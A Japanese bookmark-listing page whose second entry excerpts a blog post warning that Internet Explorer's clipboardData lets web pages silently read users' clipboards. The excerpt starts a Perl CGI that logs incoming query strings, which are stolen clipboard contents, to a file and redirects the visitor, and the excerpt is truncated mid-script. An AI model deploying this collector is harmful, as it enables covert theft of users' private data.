タグ

JavaScriptとSecurityに関するvaliumのブックマーク (2)

  • 実験的なCGIである。名前はまだない。 - www.textfile.org

    Javaに危険度「高」のぜい弱性,アプレットからファイルの書き込みや実行が可能に / オブジェクト指向プログラムのためのパターン言語の使用 / どのような勉強をすればプログラミングができるようになるのですか / はてなブックマーク:タグ個数、コメント文字数制限の変更 / 追悼: John Vlissidesさん / 『ふつうのHaskellプログラミング』 / オランダ企業、新しいURLシステムを立ち上げ / 大阪府など、ICタグ利用した学童の安全確保システム実証実験 / 『でかいプレゼン 高橋メソッドの』高橋征義 / 高橋メソッドマシーン / ウイルスバスター2006はトレンドマイクロの定義で言うところのスパイウェアである / 訃報: GoFの一人、John Vlissidesさん / NTTドコモ、位置検索で、子供の安全守るケータイを投入 / (ほぼ)10分で作るTrailsアプリ

    valium
    valium 2007/01/02
    あなたのクリップボードが盗まれる
  • あなたのクリップボードが盗まれる - Ceekz Logs

    IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。 読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。 以下のような、プログラムを準備しよう。 #!/usr/bin/perl use strict; my $file = '/tmp/cb.txt'; open (CB, ">> $file"); print CB "$ENV{'QUERY_STRING'}\n"; close (CB); print "Status: 301 Moved Permanently\n"; print "Location:

  • 1